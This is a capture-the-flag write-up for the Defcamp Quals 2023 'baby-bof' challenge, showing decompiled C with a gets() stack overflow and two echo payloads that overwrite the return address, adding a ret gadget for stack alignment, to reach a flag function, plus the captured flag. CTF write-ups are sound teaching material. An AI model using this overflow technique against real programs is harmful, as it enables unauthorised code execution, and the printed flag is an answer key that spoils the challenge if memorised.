baby-bof [Defcamp Quals 2023]

pwn
writeup by: sunbather

Challenge Description

This is a basic buffer overflow.

Flag format: CTF{sha256}

Intuition

By decompiling we see an obvious buffer overflow and a flag function that we can jump to.

void flag(void)
{
  char local_98 [136];
  FILE *local_10;
  
  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    puts("Well done!! Now use exploit remote! ");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  fgets(local_98,0x80,local_10);
  printf(local_98);
  return;
}


/* Called by the main function */
void vuln(void)
{
  char local_138 [304];
  
  gets(local_138);
  return;
}

PIE is not enabled so we can just hardcode the addresses in an echo.

Solution

Simply echo to the binary:

$ echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x67\x07\x40\x00\x00\x00\x00\x00' | ./bof
Please enter the flag: 
Segmentation fault (core dumped)

This crashes because of alignment issues. Let’s fix it with a ret gadget address (found with ROPGadget) to align it back:

echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\x05\x40\x00\x00\x00\x00\x00\x67\x07\x40\x00\x00\x00\x00\x00' | ./bof

Flag

ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99}